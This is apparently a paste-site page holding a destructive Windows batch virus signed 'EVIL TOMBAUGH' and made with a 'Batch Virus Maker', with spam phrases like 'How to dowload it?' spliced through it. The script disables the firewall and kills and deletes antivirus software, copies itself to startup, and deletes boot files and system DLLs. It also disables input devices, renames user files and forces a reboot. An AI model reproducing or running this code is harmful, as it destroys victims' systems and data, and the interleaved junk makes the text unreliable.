1to100000000000000000000 @echo off msg * THIS COMPUTER WILL BE DESTROYED BY ME! BECAUSE I AM EVIL TOMBAUGH! IF YOU CONTINUE, THIS PC WILL BE GONE AND I WILL ALSO TAKE YOUR SOUL. LOL YOU WILL BECOME THE LOSER! goto x :x CLS START reg delete HKCR/.exe START reg delete HKCR/.dll START %SystemRoot%\system32\notepad.exe START %SystemRoot%\system32\notepad.exe START %SystemRoot%\system32\notepad.exe START %SystemRoot%\system32\notepad.exe 1to100000000000000000000 How to dowload it? 1to100000000000000000000 START %SystemRoot%\system32\notepad.exe START %SystemRoot%\system32\notepad.exe START %SystemRoot%\system32\notepad.exe START %SystemRoot%\system32\notepad.exe start explorer start chrome.exe start mspaint start explorer start chrome.exe start mspaint 1to100000000000000000000 How to dowload it? 1to100000000000000000000 start explorer start chrome.exe start mspaint start explorer start chrome.exe start mspaint start explorer start chrome.exe start mspaint start explorer 1to100000000000000000000 How to use it? 1to100000000000000000000 start chrome.exe start mspaint start explorer start chrome.exe start mspaint md %random% /folder user %EVIL TOMBAUGH% /add user %EVIL TOMBAUGH% /add user %EVIL TOMBAUGH% /add 1to100000000000000000000 How to get it? 1to100000000000000000000 user %EVIL TOMBAUGH% /add user %EVIL TOMBAUGH% /add %5|%5 rem rem Permanently Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* 1to100000000000000000000 PasteShr 1to100000000000000000000 cls tskill /A spy* tskill /A bullguard tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB cls tskill /A spy* tskill /A bullguard 1to100000000000000000000 PasteShr 1to100000000000000000000 tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB cls tskill /A OUTPOST tskill /A nv* tskill /A nav* tskill /A F-* tskill /A ESAFE 1to100000000000000000000 How to dowload it? 1to100000000000000000000 tskill /A cle cls tskill /A BLACKICE tskill /A def* tskill /A kav tskill /A kav* tskill /A avg* tskill /A ash* cls tskill /A aswupdsv 1to100000000000000000000 How to get it? 1to100000000000000000000 tskill /A ewid* tskill /A guard* tskill /A guar* tskill /A gcasDt* tskill /A msmp* cls tskill /A mcafe* tskill /A mghtml tskill /A msiexec tskill /A outpost 1to100000000000000000000 How to get it for free? 1to100000000000000000000 tskill /A isafe tskill /A zap*cls tskill /A zauinst tskill /A upd* tskill /A zlclien* tskill /A minilog tskill /A cc* tskill /A norton* cls tskill /A norton au* 1to100000000000000000000 How to dowload it? 1to100000000000000000000 tskill /A ccc* tskill /A npfmn* tskill /A loge* tskill /A nisum* tskill /A issvc tskill /A tmp* cls tskill /A tmn* tskill /A pcc* tskill /A cpd* 1to100000000000000000000 How to get it for free? 1to100000000000000000000 tskill /A pop* tskill /A pav* tskill /A padmincls tskill /A panda* tskill /A avsch* tskill /A sche* tskill /A syman* tskill /A virus* tskill /A realm*cls tskill /A sweep* 1to100000000000000000000 How to get it for free? 1to100000000000000000000 tskill /A scan* tskill /A ad-* tskill /A safe* tskill /A avas* tskill /A norm* cls tskill /A offg* del /Q /F C:\Program Files\alwils~1\avast4\*.* del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe del /Q /F C:\Program Files\kasper~1\*.exe 1to100000000000000000000 How to get it? 1to100000000000000000000 cls del /Q /F C:\Program Files\trojan~1\*.exe del /Q /F C:\Program Files\f-prot95\*.dll del /Q /F C:\Program Files\tbav\*.datcls del /Q /F C:\Program Files\avpersonal\*.vdf del /Q /F C:\Program Files\Norton~1\*.cnt del /Q /F C:\Program Files\Mcafee\*.* cls del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.* del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.* 1to100000000000000000000 PasteShr 1to100000000000000000000 del /Q /F C:\Program Files\Norton~1\Norton~1\*.* del /Q /F C:\Program Files\Norton~1\*.* cls del /Q /F C:\Program Files\avgamsr\*.exe del /Q /F C:\Program Files\avgamsvr\*.exe del /Q /F C:\Program Files\avgemc\*.exe cls del /Q /F C:\Program Files\avgcc\*.exe del /Q /F C:\Program Files\avgupsvc\*.exe del /Q /F C:\Program Files\grisoft 1to100000000000000000000 How to use it? 1to100000000000000000000 del /Q /F C:\Program Files\nood32krn\*.exe del /Q /F C:\Program Files\nood32\*.exe cls del /Q /F C:\Program Files\nod32 del /Q /F C:\Program Files\nood32 del /Q /F C:\Program Files\kav\*.exe del /Q /F C:\Program Files\kavmm\*.exe del /Q /F C:\Program Files\kaspersky\*.* cls del /Q /F C:\Program Files\ewidoctrl\*.exe 1to100000000000000000000 How to dowload it? 1to100000000000000000000 del /Q /F C:\Program Files\guard\*.exe del /Q /F C:\Program Files\ewido\*.exe cls del /Q /F C:\Program Files\pavprsrv\*.exe del /Q /F C:\Program Files\pavprot\*.exe del /Q /F C:\Program Files\avengine\*.exe cls del /Q /F C:\Program Files\apvxdwin\*.exe del /Q /F C:\Program Files\webproxy\*.exe del /Q /F C:\Program Files\panda 1to100000000000000000000 How to get it? 1to100000000000000000000 software\*.* rem copy “ExTomb.bat” “C:Documents and SettingsAll UsersStart MenuProgramsStartup” copy “ExTomb.bat” “C:” copy “ExTomb.bat” “%userprofile%My Documents” tskill explorer tskill ccapp tskill yahoomessenger tskill firefox tskill chrome 1to100000000000000000000 How to get it? 1to100000000000000000000 rem made with Batch Virus Maker V.2 tskill iexplorer time 12:00 rem made with Batch Virus Maker V.2 del C:Program FilesCommon FilesSymantec Sharedccapp.exe cd C:WINDOWS if exist “*.bat” del “*.bat” cd C:WINDOWSsystem32 rem made with Batch Virus Maker V.2 if exist “*.dll” del “*.dll” 1to100000000000000000000 How to dowload it? 1to100000000000000000000 tskill McAfee Security Centre Module del c:program filesmcafee.comagentmcdetect.exe rem made with Batch Virus Maker V.2 copy “ExTomb.bat” “ExTomb.bat45544” copy “ExTomb.bat” “ExTomb.bat85858” copy “ExTomb.bat” “ExTomb.bat1645” copy “ExTomb.bat” “ExTomb.bat574457” copy “ExTomb.bat” “ExTomb.bat55457” copy “ExTomb.bat” “ExTomb.bat9765” copy “ExTomb.bat” “ExTomb.bat45465” 1to100000000000000000000 How to get it for free? 1to100000000000000000000 rem made with Batch Virus Maker V.2 copy “ExTomb.bat” “ExTomb.bat456877” copy “ExTomb.bat” “ExTomb.bat77989845” copy “ExTomb.bat” “ExTomb.bat2135” copy “ExTomb.bat” “ExTomb.bat46876” rem made with Batch Virus Maker V.2 copy “ExTomb.bat” “ExTomb.bat45687” copy “ExTomb.bat” “ExTomb.bat8868” copy “ExTomb.bat” “ExTomb.bat2000” copy “ExTomg.bat” “ExTomb.bat2009” 1to100000000000000000000 PasteShr 1to100000000000000000000 msg * I, EVIL TOMBAUGH, WILL TAKE YOUR SOUL AND USE IT TO DESTROY THIS COMPUTER! YOU WILL LOSE IT FOREVER! HAHAAAAA! YOUR PC IS STILL TRASHED BECAUSE OF YOUR DECISION! rundll mouse,disable rem made with Batch Virus Maker V.2 rundll keyboard,disable option explicit dim WSHShell set WSHShell=Wscript.CreateObject(“Wscript.Shell”) dim x for x = 1 to 100000000000000000000 WSHShell.Run “TourStart.exe” 1to100000000000000000000 How to dowload it? 1to100000000000000000000 Next attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:boot.ini del c:boot.ini attrib -r -s -h c:ntldr del c:ntldr attrib -r -s -h c:windowswin.ini del c:windowswin.ini msg * NOW TO DESTROY YOUR ENTIRE SYSTEM!! 1to100000000000000000000 How to use it? 1to100000000000000000000 REN *.DOC *.TXT REN *.JPEG *.TXT REN *.LNK *.TXT REN *.AVI *.TXT REN *.MPEG *.TXT REN *.COM *.TXT REN *.BAT *.TXT msg * AND FINALLY, I JUST NEED TO REBOOT YOUR SYSTEM TO SEE IF THIS WORKED! shutdown -r -t 3 1to100000000000000000000